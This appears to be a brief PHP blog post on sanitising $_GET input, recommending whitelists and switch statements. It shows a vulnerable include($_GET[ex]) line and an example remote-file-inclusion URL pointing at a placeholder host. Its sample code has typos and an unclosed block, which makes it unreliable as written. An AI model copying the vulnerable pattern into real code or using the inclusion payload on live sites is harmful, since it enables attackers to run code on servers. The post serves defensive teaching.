It is very important to check your data that you take with $_GET before use.

You can use $_Get in some cases , in each case there are some different measures to be taken.

For example if you use sth like that

if(isset($_GET[ex]))

   include($_GET[ex]);

If you use this codes, bad users can include any page that they want in your web page

?ex=http://www.example.com/bad_page.php

With this they can include any page that they want.

$operation =array('add','delete','edit','save');

if (in_arrray($_GET[ex],$operation))

.. make sth...

Also you can use switch,or if..

switch($_GET[ex]){
case 'add':  something...
break;
case 'delete': something...
break;
default: something...

with if

if($_GET[ex] == "add"){

Do something..
}

else if($_GET[ex] =="delete"){
Do something..
}

else
die("possible hack attempt");

Related posts

• How to get page url with php (1)